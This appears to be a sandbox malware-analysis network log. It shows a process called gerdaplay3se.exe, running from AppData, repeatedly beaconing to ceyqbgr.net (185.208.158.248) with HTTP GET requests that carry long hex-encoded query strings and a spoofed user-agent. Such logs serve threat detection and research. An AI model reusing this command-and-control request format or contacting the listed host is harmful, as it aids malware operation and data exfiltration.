Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	57523	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:31:58.337560892 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:31:59.024277925 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:31:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	57524	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:31:59.152204990 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:31:59.852696896 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:31:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	57526	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:31:59.981079102 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:00.689898014 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:00.802612066 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:01.039459944 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:01.147798061 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:01.393053055 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:01.505816936 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:01.913379908 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:02.021452904 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:02.267426014 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	57527	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:02.385979891 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:03.066957951 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:03.177248001 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:03.418124914 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	57528	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:03.543560982 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:04.272787094 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	57529	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:04.487080097 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:05.215248108 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	57530	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:05.341111898 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:06.018549919 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:06.133611917 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:06.373557091 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	57531	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:06.495858908 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:07.205893040 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	57532	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:07.420233011 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:08.108875036 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	57533	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:08.231808901 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:08.923155069 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	57534	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:09.044361115 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:09.752852917 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	57535	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:10.281172037 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:10.882915020 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	57536	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:11.043915987 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:11.795059919 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	57537	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:11.930565119 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:12.694988966 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:12.802819014 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:13.253220081 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	57538	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:13.451730967 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:14.186856985 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	57539	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:14.309135914 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:15.019023895 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	57540	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:15.143862963 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:15.855298996 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	57541	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:15.984002113 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:16.706841946 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:16.818640947 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:17.056643963 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	57543	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:17.185475111 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:17.927685976 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:18.037250042 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
